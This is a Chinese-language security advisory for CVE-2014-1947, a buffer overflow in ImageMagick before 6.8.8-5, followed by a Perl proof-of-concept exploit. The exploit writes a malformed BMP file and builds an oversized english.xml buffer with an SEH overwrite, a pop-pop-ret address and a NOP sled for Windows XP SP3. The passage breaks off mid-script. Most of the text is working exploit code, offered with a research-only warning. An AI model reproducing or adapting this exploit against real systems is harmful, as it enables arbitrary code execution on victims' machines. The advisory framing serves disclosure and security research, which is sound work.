发布日期:2014-02-19
更新日期:2014-02-22
受影响系统:
ImageMagick ImageMagick < 6.8.8-5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65683
CVE(CAN) ID: CVE-2014-1947
ImageMagick是一款Unix/Linux平台下开源的图像查看和编辑工具。
ImageMagick 6.5.4及其他版本coders/psd.c内的WritePSDImage()函数存在安全漏洞,在写PSD图形过程中处理层时会触发此漏洞。这可使上下文关联的攻击者破坏内存,造成崩溃或执行任意代码。
<*来源:Justin Grant
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
########################################################################################
# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)
# Date: 2-13-2014
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)
# Software Link:
# Version Tested: 6.8.8-4
# Tested On: Windows XP SP3
########################################################################################
# Credits:
#
# CVE-2014-1947 published Feb 08 2014
# by Justin Grant
#
#
########################################################################################
# Overview:
#
# I saw the notice for this CVE today but there was no known published expoits so
# I figured I'd put together this quick POC. Note, all app modules for the tested
# version were compiled with safeSEH so my use of an OS module may require adjustment
# of the offsets. There also appears to be several bad chars that fail the sploit.
# For this POC I only generate a basic messagebox using FatalAppExit(). It may take
# some work to get it to do more.
#
# How it works:
#
# This particular BOF takes advantage of insecure handling of the english.xml file
# which the app uses to display various error messages. I didn't spend much time
# investigating the app so there may be additional vulnerable locations
#
# This script generates two files:
# 1) a malfored .bmp file that will cause ImageMagick to generate a specific
# error when opened (LengthAndFilesizeDoNotMatch), as defined in the
# english.xml file
# 2) a modified english.xml file that replaces the original error message with
# our exploit code
#
# To test this POC:
# 1) run the script, replace the original english.xml file (in App's folder)
# 2) open the .bmp file with ImageMagick
########################################################################################
# file write function
sub write_file {
my ($file, $buffer) = @_;
open(FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file [" . $file . "] created\n";
print "Buffer size: " . length($buffer) . "\n";
}
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
my $header = "\x42\x4d"; # BM
$header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
$header = $header . "\x00\x00\x00\x00"; # unused
$header = $header . "\x36\x00\x00\x00"; # bitmap offset
$header = $header . "\x28\x00\x00\x00"; # header size
$header = $header . "\x02\x00\x00\x00"; # width
$header = $header . "\x02\x00\x00\x00"; # height
$header = $header . "\x01\x00"; # num of color planes
$header = $header . "\x18\x00"; # num of bits per pixel
$header = $header . "\x00\x00\x00\x00"; # compression (none)
$header = $header . "\x10\x00\x00\x00"; # image size
$header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
$header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
$header = $header . "\x00\x00\x00\x00"; # colors in palette
$header = $header . "\x00\x00\x00\x00"; #important colors
return $header;
}
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data;
write_file("corrupt.bmp", $buffer);
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp pop ebx ret
# ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for file-> open and 1 for the open file menubar button
my $nops = "\x90" x 100;